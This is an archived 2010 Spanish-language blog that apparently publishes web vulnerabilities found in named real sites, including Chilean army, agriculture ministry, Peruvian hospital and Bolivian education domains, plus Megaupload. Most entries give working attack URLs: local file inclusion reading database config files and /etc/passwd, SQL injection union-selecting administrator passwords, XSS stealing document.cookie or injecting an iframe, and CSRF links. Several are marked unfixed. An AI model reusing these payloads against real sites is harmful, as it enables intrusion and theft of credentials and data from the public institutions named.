janito24

Archive for the ‘Uncategorized’ Category

Vulnerabilidad www.almatec.com.ar

In Uncategorized on septiembre 25, 2010 at 8:32 pm

Sitio web: www.almatec.com.ar
Descubridor: Ari-Slash
URL del aviso:
Fecha de descubrimiento: 20 Enero 2010
Fecha de notificación: 20 de Enero 2010
Fecha de publicación: 25 de septiembre 2010
Arreglado: Si, pero ahora da lugar a un SQLI
Vulnerabilidad: LFI y SQLIInformacion adicional: el arreglo consistio en dar un id unico a cada archivo que se subia, de la forma download.php?id=
pero esa solucion dio lugar a sqli, siempre tomando el 2 campo del select debido a que debian retornarse cierta cantidad de columnas.

LFI (reparado):
www.almatec.com.ar/download.php?file=admin/includes/Class.DB.php

SQLI:
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,nombre,password,4%20from%20administrador%20where%20id=1;–
http://almatec.com.ar/descargas2.php?id=4%20union%20select%20id,password,nombre,4%20from%20administrador%20where%20id=1;–

Federacion Chilena del Remo

In Uncategorized on septiembre 20, 2010 at 4:05 pm

Sitio web: http://www.federacionchilenaderemo.cl
Descubridor: Ari-Slash
URL del aviso: esta misma pagina xD
Fecha de descubrimiento: 20 de septiembre 2010
Fecha de notificación: 20 de septiembre 2010
Fecha de publicación: 20 de septiembre 2010
Arreglado: No
Vulnerabilidad: SQLI en el buscador

CSRF www.megaupload.com

In Uncategorized on febrero 19, 2010 at 4:59 am

Sitio web: http://www.megaupload.ccom
Descubridor: janito24
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: CSRF (Cambio de idioma arbitrario)

http://megaupload.com/?setlang=es a español
http://megaupload.com/?c=contact&setlang=de a aleman
http://www.megaupload.com/?d=9450P71D&setlang=fr a frances

NOTA: "TODAS" las urls de megaupload son vulnerables, por lo tanto desde cualquier parte pueden cambiar el idioma a quien quieran con tan solo mandarle el link

XSS www.ejercito.cl (ejercito de chile)

In Uncategorized on febrero 19, 2010 at 4:41 am

Sitio web: www.ejercito.cl <– Pagina de inicio Wamp
Descubridor: janito24
Fecha de descubrimiento: 19 de febrero 2010
Fecha de notificación: 19 de febrero 2010
Fecha de publicación: 19 de febrero 2010
Arreglado: No
Información adicional: XSS

http://www.ejercito.cl/nuestro_ejercito/discursos.php?id=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerabilidad en localhost

In Uncategorized on enero 22, 2010 at 7:13 am

Sitio web: http://localhost/ <– Pagina de inicio Wamp
Descubridor: janito24
URL del aviso:
Fecha de descubrimiento: 22 de enero 2010
Fecha de notificación: 22 de enero 2010
Fecha de publicación: 22 de enero 2010
Arreglado: No
Información adicional: XSS en la variable lang.
http://localhost/?lang=%22%3E%3Ch3%3Exss%3C/h3%3E

Vulnerabilidad en hospitalvitarte.gob.pe

In Uncategorized on enero 21, 2010 at 6:58 am

Sitio web: http://www.hospitalvitarte.gob.pe/ <– Ministerio de salud
Descubridor: Ari-Slash
URL del aviso: http://www.hospitalvitarte.gob.pe/
Fecha de descubrimiento: 18 de enero 2010
Fecha de notificación:
Fecha de publicación: 19 de enero 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
http://www.hospitalvitarte.gob.pe/download.php?url=../lib/DAL/db.class.php

saludos

Vulnerabilidad en ceplag.edu.bo

In Uncategorized on enero 21, 2010 at 6:56 am

Sitio web: www.ceplag.edu.bo
Descubridor: Ari-Slash
Fecha de descubrimiento: 18 de enero de 2010
Fecha de notificación: 18 de enero de 2010
Fecha de publicación: 18 de enero de 2010
Arreglado: No
Vulnerabilidad: LFI
Código:
http://www.ceplag.edu.bo/php/descargar.php?file=/Connections/link.php

Vulnerabilidad en lostambos.com.pe

In Uncategorized on enero 21, 2010 at 6:54 am

Sitio web: lostambos.com.pe
Descubridor: Ari-Slash y el-pollo
Fecha de descubrimiento: 17 de enero de 2010
Fecha de notificación: 17 de enero de 2010
Fecha de publicación: 17 de enero de 2010
Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD)
Vulnerabilidad: LFI
Código:
http://www.lostambos.com.pe/download.php?f=../inc.config.php

saludos

Vulnerabilidad en minagri.gob.cl

In Uncategorized on enero 21, 2010 at 6:52 am

Sitio web: http://www.minagri.gob.cl/
Descubridor: Ari-Slash
Fecha de descubrimiento: 16 de enero de 2010
Fecha de notificación: 16 de enero de 2010
Fecha de publicación: 16 de enero de 2010
Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ )
Vulnerabilidad: LFI
Código:
http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php
http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd

Vulnerabilidad: XSS
Código:
http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C